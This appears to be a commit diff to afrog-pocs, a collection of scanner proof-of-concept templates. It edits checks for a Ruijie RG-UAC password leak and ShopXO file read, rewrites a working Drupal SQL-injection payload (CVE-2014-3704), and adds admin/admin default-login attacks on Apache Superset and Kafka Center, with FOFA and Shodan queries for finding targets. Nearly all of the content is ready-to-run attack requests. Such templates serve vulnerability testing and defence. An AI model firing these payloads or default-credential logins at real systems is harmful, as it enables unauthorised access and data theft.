cve-2021-44451 && kafaka-default-pwd

afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml

@@ -1,14 +1,16 @@
 id: CNVD-2021-14536
 
 info:
-    name: 锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞
-    author: jweny(https://github.com/jweny)
+    name: Ruijie RG-UAC Information Disclosure
+    author: jweny(https://github.com/jweny) daffainfo
     severity: high
+    description: |
+        fofa-query: 'title="RG-UAC登录页面"'
 
 rules:
     r0:
         request:
             method: GET
             path: /login.php
-        expression: response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
+        expression: response.status == 200 && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
 expression: r0()

afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml

@@ -4,6 +4,8 @@ info:
     name: ShopXO File Read
     author: Print1n(http://print1n.top)
     severity: high
+    reference:
+        - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
 
 rules:
     Linux0:

afrog-pocs/CVE/2014/CVE-2014-3704.yaml

@@ -5,12 +5,14 @@ info:
     author: unkown
     severity: high
 
+set:
+    rand: randomInt(200000000, 210000000)
 rules:
     r0:
         request:
             method: POST
             path: /?q=node&destination=node
-            body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
-        expression: response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
+            body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,(select md5({{rand}}))),0)%23]=bob&name[0]=a
+        expression: response.status == 500 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
 expression: r0()
 

afrog-pocs/CVE/2021/CVE-2021-44451.yaml

@@ -0,0 +1,35 @@
+id: CVE-2021-44451
+
+info:
+  name: Apache Superset Default Password
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
+    Users should upgrade to Apache Superset 1.4.0 or higher.
+    Fofa: app="APACHE-Superset"
+  reference:
+    - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44451
+
+set:
+  refererUrl: request.url
+rules:
+  r0:
+    request:
+      method: GET
+      path: /login/
+    expression: response.status == 200
+    output:
+      search: '"value=\"(?P<cs_token>.*?)\">".bsubmatch(response.body)'
+      cs_token: search["cs_token"]
+  r1:
+    request:
+      method: POST
+      path: /login/
+      headers:
+        Referer: "{{refererUrl}}/admin/airflow/login"
+      body: |
+        csrf_token={{cs_token}}&username=admin&password=admin
+    expression: response.status == 302 && response.body.bcontains(b'<title>Redirecting...</title>') && response.body.bcontains(b'<h1>Redirecting...</h1>')  && response.body.bcontains(b'<a href="/">') && response.raw_header.bcontains(b'session')
+expression: r0() && r1()

afrog-pocs/default-pwd/kafka-center-default-password.yaml

@@ -0,0 +1,20 @@
+id: kafka-center-default-password
+
+info:
+  name: Apache Kafka Center Default Password
+  author: dhiyaneshDK
+  severity: high
+  description: |
+    shodan-query: http.title:"Kafka Center"
+
+rules:
+  r0:
+    request:
+      method: POST
+      path: /login/system
+      headers:
+        Content-Type: application/json
+      body: |
+        {"name":"admin","password":"admin","checkbox":false}
+    expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"name":"admin"')
+expression: r0()